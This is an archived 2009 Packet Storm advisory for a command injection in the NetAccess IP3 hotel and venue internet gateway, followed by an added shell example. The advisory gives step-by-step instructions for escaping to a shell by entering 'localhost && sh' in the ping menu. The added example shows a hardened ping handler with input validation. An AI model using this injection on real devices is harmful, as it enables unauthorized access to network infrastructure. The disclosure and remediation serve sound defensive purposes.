NetAccess IP3 Command Injection

2009-09-16T00:00:00
ID PACKETSTORM:81328
Type packetstorm
Reporter r00t
Modified 2009-09-16T00:00:00

Description

                                        
`###############################################################  
#NetAccess IP3 - Force into shell  
#By: r00t  
#Shouts: G., Tee, ES, s1ngl3, and D1g1t5  
#  
###############################################################  
#Requirements: Remote access to an IP3  
# Any level control panel username/password  
#  
###############################################################  
#Vendor Information:  
#Thanks to Sebastian Wolfgarten (sebastian at wolfgarten dot com)  
#for including vendor information in his AFD vuln  
#  
#"IP3's NetAccess is a device created for high demand environments such as  
#convention centers or hotels. It handles the Internet access and  
#provides for instance firewalling, billing, rate-limiting as well as  
#various authentication mechanisms. The device is administrated via SSH  
#or a web-based GUI."  
#  
###############################################################  
  
1. SSH into the IP3's IP address  
2. After logging in, select the "ping" option (usually menu item 5)  
3. Ping the address: localhost && sh  
4. After four pings to localhost, shell will be forced open  
  
One may think there are limitations once logged into shell without  
root access on an IP3. Wrong.  
  
`
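
The behaviour in step 3 is consistent with a menu that pastes the typed address into a shell command line. The following is an added example, not code from the advisory or from the IP3 firmware (whose menu implementation is not shown on this page): a hypothetical POSIX sh ping handler, with the injectable pattern kept as a comment and a validated, quoted call as the fix. The function names is_valid_ping_target and menu_ping are assumptions.

```shell
#!/bin/sh
# Added example: hypothetical menu "ping" handler (not the IP3's real code).
LC_ALL=C; export LC_ALL   # make the A-Z / a-z ranges below plain ASCII

# Injectable pattern, kept as a comment so it is never executed:
#   read target
#   sh -c "ping -c 4 $target"    # "localhost && sh" is parsed as two commands
#
# Hardened pattern: check the input against a strict allowlist, then pass it
# to ping as one quoted argument so no shell re-parses it.

# Return 0 only for a hostname or IPv4 literal made of letters, digits,
# dots and hyphens, 1 to 253 characters long.
is_valid_ping_target() {
    target=$1
    [ -n "$target" ] || return 1
    [ "${#target}" -le 253 ] || return 1
    case $target in
        -*|.*) return 1 ;;               # would be read as a ping option / bad name
        *[!A-Za-z0-9.-]*) return 1 ;;    # space, &, ;, |, $, backtick, quotes, ...
    esac
    return 0
}

# Ping a validated target four times; refuse anything else with status 2.
menu_ping() {
    target=$1
    if ! is_valid_ping_target "$target"; then
        echo "rejected ping target" >&2  # worth logging: likely injection attempt
        return 2
    fi
    ping -c 4 "$target"
}
```

Validation alone is not the whole fix: the menu account should also have no usable login shell behind it, so that a missed input path does not end in an interactive sh.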